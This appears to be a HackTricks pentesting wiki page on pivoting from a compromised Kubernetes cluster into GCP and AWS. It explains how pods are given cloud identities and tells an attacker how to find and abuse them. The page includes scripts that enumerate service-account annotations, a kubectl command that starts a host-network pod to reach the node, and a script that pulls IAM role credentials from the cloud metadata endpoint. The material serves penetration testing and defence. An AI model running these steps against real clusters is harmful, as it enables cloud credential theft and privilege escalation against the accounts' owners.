HackTricks
Search…
🤩
Generic Methodologies & Resources
🐧
Linux Hardening
🍏
MacOS Hardening
🪟
Windows Hardening
📱
Mobile Pentesting
👽
Network Services Pentesting
🕸
Pentesting Web
⛈
Cloud Security
😎
Hardware/Physical Access
🦅
Reversing & Exploiting
🔮
Crypto & Stego
🧐
External Platforms Reviews/Writeups
✍
TODO
Kubernetes Access to other Clouds
Support HackTricks and get benefits!
GCP
If you are running a k8s cluster inside GCP you will probably want that some application running inside the cluster has some access to GCP. There are 2 common ways of doing that:
Mounting GCP-SA keys as secret
A common way to give access to a kubernetes application to GCP is to:
- Create a GCP Service Account
- Bind on it the desired permissions
- Download a json key of the created SA
- Mount it as a secret inside the pod
- Set the GOOGLE_APPLICATION_CREDENTIALS environment variable pointing to the path where the json is.
Therefore, as an attacker, if you compromise a container inside a pod, you should check for that env variable and json files with GCP credentials.
GKE Workload Identity
With Workload Identity, we can configure a Kubernetes service account to act as a Google service account. Pods running with the Kubernetes service account will automatically authenticate as the Google service account when accessing Google Cloud APIs.
The first series of steps to enable this behaviour is to enable Workload Identity in GCP (steps) and create the GCP SA you want k8s to impersonate.
The second steps is to relate a K8s SA (KSA) with the GCP SA (GSA):
- Create the KSA (normally in the annotations appear the email of the GSA) and use it in the pod you would like to:
1
# serviceAccount.yaml
2
apiVersion: v1
3
kind: ServiceAccount
4
metadata:
5
annotations:
6
iam.gke.io/gcp-service-account: $GSA-[email protected]-ID.iam.gserviceaccount.com
7
name: $APPNAME
8
namespace: $NAMESPACE
Copied!
- Create the KSA - GSA Binding:
1
gcloud iam service-accounts \
2
--role roles/iam.workloadIdentityUser \
3
--member "serviceAccount:PROJECT-ID.svc.id.goog[$NAMESPACE/$KSA-NAME]" \
4
Copied!
Note how you are creating a binding and in the member field you can find the namespace and KSA name.
As an attacker inside K8s you should search for SAs with the
iam.gke.io/gcp-service-account annotation as that indicates that the SA can access something in GCP. Another option would be to try to abuse each KSA in the cluster and check if it has access.
From GCP is always interesting to enumerate the bindings and know which access are you giving to SAs inside Kubernetes.This is a script to easily iterate over the all the pods definitions looking for that annotation:
1
for ns in `kubectl get namespaces -o custom-columns=NAME:.metadata.name | grep -v NAME`; do
2
for pod in `kubectl get pods -n "$ns" -o custom-columns=NAME:.metadata.name | grep -v NAME`; do
3
echo "Pod: $ns/$pod"
4
kubectl get pod "$pod" -n "$ns" -o yaml | grep "gcp-service-account"
5
echo ""
6
echo ""
7
done
8
done | grep -B 1 "gcp-service-account"
Copied!
AWS
Kiam & Kube2IAM (IAM role for Pods)
First of all you need to configure which roles can be accessed inside the namespace, and you do that with an annotation inside the namespace object:
Kiam
1
kind: Namespace
2
metadata:
3
name: iam-example
4
annotations:
5
iam.amazonaws.com/permitted: ".*"
Copied!
Kube2iam
1
apiVersion: v1
2
kind: Namespace
3
metadata:
4
annotations:
5
iam.amazonaws.com/allowed-roles: |
6
["role-arn"]
7
name: default
Copied!
Once the namespace is configured with the IAM roles the Pods can have you can indicate the role you want on each pod definition with something like:
Kiam & Kube2iam
1
kind: Pod
2
metadata:
3
name: foo
4
namespace: external-id-example
5
annotations:
6
iam.amazonaws.com/role: reportingdb-reader
Copied!
As an attacker, if you find these annotations in pods or namespaces or a kiam/kube2iam server running (in kube-system probably) you can impersonate every role that is already used by pods and more (if you have access to AWS account enumerate the roles).
Create Pod with IAM Role
The IAM role to indicate must be in the same AWS account as the kiam/kube2iam role and that role must be able to access it.
1
echo 'apiVersion: v1
2
kind: Pod
3
metadata:
4
annotations:
5
iam.amazonaws.com/role: transaction-metadata
6
name: alpine
7
namespace: eevee
8
spec:
9
containers:
10
- name: alpine
11
image: alpine
12
command: ["/bin/sh"]
13
args: ["-c", "sleep 100000"]' | kubectl apply -f -
Copied!
Workflow of IAM role for Service Accounts via OIDC
This is the recommended way by AWS.
- 1.
- 2.Then you create an IAM role with the permissions the SA will require.
- 3.Create a trust relationship between the IAM role and the SA name (or the namespaces giving access to the role to all the SAs of the namespace). The trust relationship will mainly check the OIDC provider name, the namespace name and the SA name.
- 4.Finally, create a SA with an annotation indicating the ARN of the role, and the pods running with that SA will have access to the token of the role. The token is written inside a file and the path is specified in
AWS_WEB_IDENTITY_TOKEN_FILE(default:/var/run/secrets/eks.amazonaws.com/serviceaccount/token)
1
apiVersion: v1
2
kind: ServiceAccount
3
metadata:
4
annotations:
5
eks.amazonaws.com/role-arn: arn:aws-cn:iam::ACCOUNT_ID:role/IAM_ROLE_NAME
Copied!
As an attacker, if you can enumerate a K8s cluster, check for service accounts with that annotation to escalate to AWS. To do so, just exec/create a pod using one of the IAM privileged service accounts and steal the token.
Moreover, if you are inside a pod, check for env variables like AWS_ROLE_ARN and AWS_WEB_IDENTITY_TOKEN.
Find Pods a SAs with IAM Roles in the Cluster
This is a script to easily iterate over the all the pods and sas definitions looking for that annotation:
1
for ns in `kubectl get namespaces -o custom-columns=NAME:.metadata.name | grep -v NAME`; do
2
for pod in `kubectl get pods -n "$ns" -o custom-columns=NAME:.metadata.name | grep -v NAME`; do
3
echo "Pod: $ns/$pod"
4
kubectl get pod "$pod" -n "$ns" -o yaml | grep "amazonaws.com"
5
echo ""
6
echo ""
7
done
8
for sa in `kubectl get serviceaccounts -n "$ns" -o custom-columns=NAME:.metadata.name | grep -v NAME`; do
9
echo "SA: $ns/$sa"
10
kubectl get serviceaccount "$sa" -n "$ns" -o yaml | grep "amazonaws.com"
11
echo ""
12
echo ""
13
done
14
done | grep -B 1 "amazonaws.com"
Copied!
Node IAM Role
The previos section was about how to steal IAM Roles with pods, but note that a Node of the K8s cluster is going to be an instance inside the cloud. This means that the Node is highly probable going to have a new IAM role you can steal (note that usually all the nodes of a K8s cluster will have the same IAM role, so it might not be worth it to try to check on each node).
There is however an important requirement to access the metadata endpoint from the node, you need to be in the node (ssh session?) or at least have the same network:
1
kubectl run NodeIAMStealer --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostNetwork": true, "containers":[{"name":"1","image":"alpine","stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent"}]}}'
Copied!
Steal IAM Role Token
Previously we have discussed how to attach IAM Roles to Pods or even how to escape to the Node to steal the IAM Role the instance has attached to it.
You can use the following script to steal your new hard worked IAM role credentials:
1
IAM_ROLE_NAME=$(curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null || wget http://169.254.169.254/latest/meta-data/iam/security-credentials/ -O - 2>/dev/null)
2
if [ "$IAM_ROLE_NAME" ]; then
3
echo "IAM Role discovered: $IAM_ROLE_NAME"
4
if ! echo "$IAM_ROLE_NAME" | grep -q "empty role"; then
5
echo "Credentials:"
6
curl "http://169.254.169.254/latest/meta-data/iam/security-credentials/$IAM_ROLE_NAME" 2>/dev/null || wget "http://169.254.169.254/latest/meta-data/iam/security-credentials/$IAM_ROLE_NAME" -O - 2>/dev/null
7
fi
8
fi
Copied!
References
Support HackTricks and get benefits!
Last modified 19d ago